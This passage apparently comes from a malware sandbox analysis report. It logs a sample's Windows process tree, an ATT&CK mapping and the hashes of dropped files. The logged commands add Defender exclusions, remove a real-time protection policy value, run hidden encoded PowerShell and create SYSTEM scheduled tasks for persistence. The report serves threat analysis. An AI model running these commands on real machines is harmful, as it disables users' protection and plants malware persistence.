powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:32
2⤵
PID:2900

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2000

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:64
2⤵
PID:1752

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2004

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:32
2⤵
PID:2144

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1944

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:64
2⤵
PID:2080

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1960

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\uxsKyVOxFpVdyluD\ARMIOEIN\hmFmhwugdTajFBiS.wsf"
2⤵
PID:2668

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\uxsKyVOxFpVdyluD\ARMIOEIN\hmFmhwugdTajFBiS.wsf"
2⤵
PID:1152

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:1472

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2564

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2500

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2360

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2132

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2748

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2088

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:1912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2104

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:1880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:1496

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2352

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1176

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2624

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1204

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1612

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2208

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gCqZdsRvg" /SC once /ST 03:57:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:3000

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gCqZdsRvg"
2⤵
PID:2052

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gCqZdsRvg"
2⤵
PID:2952

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
2⤵
PID:560

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
PID:2888

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
2⤵
PID:3012

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
3⤵
PID:1208

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nXyehDwmHPyyRtSpH"
2⤵
PID:2076

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nXyehDwmHPyyRtSpH"
2⤵
PID:1248

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nXyehDwmHPyyRtSpH2"
2⤵
PID:1620

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nXyehDwmHPyyRtSpH2"
2⤵
PID:2480

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "aPDUmbyOvRHXxkUgy"
2⤵
PID:2288

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "aPDUmbyOvRHXxkUgy"
2⤵
PID:2596

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "aPDUmbyOvRHXxkUgy2"
2⤵
PID:2608

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "aPDUmbyOvRHXxkUgy2"
2⤵
PID:2472

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "MVHoCtCeIZaPacKATKY"
2⤵
PID:2592

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MVHoCtCeIZaPacKATKY"
2⤵
PID:2924

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "MVHoCtCeIZaPacKATKY2"
2⤵
PID:1888

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MVHoCtCeIZaPacKATKY2"
2⤵
PID:2124

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "QyHDZeZycVybuDMKzsX"
2⤵
PID:2092

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QyHDZeZycVybuDMKzsX"
2⤵
PID:2748

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "QyHDZeZycVybuDMKzsX2"
2⤵
PID:2132

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QyHDZeZycVybuDMKzsX2"
2⤵
PID:852

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\HCtEkPSKU\TwUOyK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "kuRaZQzPzSEXqOG" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2232

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "LHaWkDmLjErwAUu"
2⤵
PID:1556

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "LHaWkDmLjErwAUu"
2⤵
PID:1968

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "LHaWkDmLjErwAUu2"
2⤵
PID:1536

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "LHaWkDmLjErwAUu2"
2⤵
PID:1480

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FDoxwemLCToLkG"
2⤵
PID:2112

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FDoxwemLCToLkG"
2⤵
PID:1512

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZqYrCjlOPEYEs"
2⤵
PID:2336

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZqYrCjlOPEYEs"
2⤵
PID:2344

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZqYrCjlOPEYEs2"
2⤵
PID:1884

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZqYrCjlOPEYEs2"
2⤵
PID:2744

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "kuRaZQzPzSEXqOG2" /F /xml "C:\Program Files (x86)\HCtEkPSKU\zVkbFST.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2812

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "kuRaZQzPzSEXqOG"
2⤵
PID:2832

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "kuRaZQzPzSEXqOG"
2⤵
PID:2124

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "JtqMXtEvkLBXZN" /F /xml "C:\Program Files (x86)\aSRIytoBnSqU2\FpXhoUA.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2784

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "lYzkwzoDPQRBQ2" /F /xml "C:\ProgramData\hduqDfvYrAfrHLVB\MDHwiOF.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2120

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "aPDUmbyOvRHXxkUgy2" /F /xml "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\yuHZwHb.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2068

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QyHDZeZycVybuDMKzsX2" /F /xml "C:\Program Files (x86)\GiPqhqLluuCEC\tKphAJs.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 268
2⤵
- Program crash
PID:2396

C:\Windows\system32\taskeng.exe
taskeng.exe {6C351B03-A3D7-47AE-A392-9852CA7550D7} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
1⤵
PID:804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:3068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1196

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:780

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1360

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1732

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1020

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GiPqhqLluuCEC\tKphAJs.xml
Filesize
2KB

MD5
c4ba44b6ef23e4d8d107d2260eea2841

SHA1
414fd6d2125b0f61e567851c364e938928fc77c7

SHA256
1a92133dc9bc9b20a9215de4de5f7852b254fa8500ff5a3476edc7e4f1791747

SHA512
4313f1c143c3f82b422f176122fe3d990df81112f27da493923cd6043106b694b0bc07a29192fc139dbf99bd13778627bd9ae9bcf3f64ce2e2d730f7361ffa17

Download Submit
C:\Program Files (x86)\HCtEkPSKU\zVkbFST.xml
Filesize
2KB

MD5
57c824c11c3e6ed179c67939b45c85b3

SHA1
624866f8b091a6e589a4440e45038a3893ce2c02

SHA256
41b10bcd1e4493f2cd1e9aa1748c652b61b6234f645d7daf291449e3a340f435

SHA512
bcb9b6cb31ca2525130406fabc32fcfd8ee1a2551362329db9aa0082b42c783d5579d697fd07909293bf95849cbab6c4bf5ef243f1b7e5ad0a4c50377cb75777

Download Submit
C:\Program Files (x86)\aSRIytoBnSqU2\FpXhoUA.xml
Filesize
2KB

MD5
8c1dee459fe5e32abf00e036e63d0fae

SHA1
21784a082e6edd54c0a386f2a4ed62c929c0965f

SHA256
a45bc97d1465f1b16d86d9867c716f1b55561c3605edd8048a7a686c5f4b6f98

SHA512
bedf6ffa0e4abb787e3a0370aa40abbfdc53903bb61f772b2e3a46b9b3da146fb7446c0048ef2504292e545736cedf71c2728550428fbe63f6bcc7ed90e91d36

Download Submit
C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\yuHZwHb.xml
Filesize
2KB

MD5
d67f0d5ccb365632ac259b64994c2405

SHA1
4aeca6afe89dc6bd683b38a78fdce3a3f594bd66

SHA256
37c82ba01190f57c9c19d95496704eddf8082dedd52cd58c69c5fc810df9a668

SHA512
d2bf374e7d0169e7577958c702195358cc0c9f77924fce8a135491320d8ad3040798c97e053b508412a351dec3c4b92bfbe4745a029fb3ae2df2e595dc1f1976

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpi
Filesize
640KB

MD5
c18ffa61f37cd70c6e84068b104217e0

SHA1
6709a23ee9865872924fba28f2f177c59011eed8

SHA256
fd430e616b8572849fb1c39b0c1f5c5cb7c243243ddf4c4a1a4a2c7a4fd84a7e

SHA512
742fea837bf81178bbbca5869dd36d2bfe97e810ef03c732c35423cdd5aaa54f455afa0b7adb6f6e9889dd09879eba83e2e13271e658f263d1f2f9e7acf9fc2e

Download Submit
C:\ProgramData\hduqDfvYrAfrHLVB\MDHwiOF.xml
Filesize
2KB

MD5
0f8ab85c7c1a4428b45a80658598d1cc

SHA1
ed43248b1e531b06506f1b2a07effc8558396aa3

SHA256
1b4944b69092252da3df29bf60581d53028a91a78240b2e909b34ca6a51d517e

SHA512
efafa6a87242d1af661bfef7d615807b893497f2d2ad1717681151665dbc1e670dc69cbb19d8b72fdc22f95667eac88b0c70a5e1f0d2fe7d373bed5e3c567928

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\_locales\en\messages.json
Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\_locales\pt_BR\messages.json
Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\43JRD5R919C9MEYAZPTV.temp
Filesize
7KB

MD5
336ff9346b3dd7a8524f8bd56b255b59

SHA1
ed0871a93f65f2be83401c932d6dced842cf3ceb

SHA256
8d3c01de117121b8a44344ded346aa555754d16e592fa5b52003781fc48f1b82

SHA512
1a4b7e34947e7facc62706290e39aa83cafff623f26dac53e871cbcd7b29f273d6d0b9a27e2164b606dea12fdd998560d34ed2cb6385049d373eb8cac7eff988

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
870d02d3fdbba6c03629371c363f596e

SHA1
cc1bc29cb21174c6f22a6947d547f3a6b033f475

SHA256
d830e94c2d98621fad66cfcbc901a8b728cbd4ee04ec65cb5fd85b5248c62b05

SHA512
bfd0880d9bec7444f13bf7d4be195977832f8cb1167d01be01f46ece35786f81c9e66d11cda8cafb6af63fd9c60e0044fcac0d560dc3fd78d6306d5c2c0e269b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GE6QBBB5QH8XLU19LB92.temp
Filesize
7KB

MD5
0e09dbffd9205e87ab4e02977205578a

SHA1
070284ad1f4e21ccf8dd818c2c484902fe2000bc

SHA256
cd588fdd422bb5c62e32be0223c01e209394114196f0e4fe1097c5020bcf55e5

SHA512
5f2ff37a03bdf214df43980d56b023412541056c47f55321506d9b0440198ac9b3ea75493e7e6024232b28d98548d5204f0303f389505085d157c40eefe3009f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
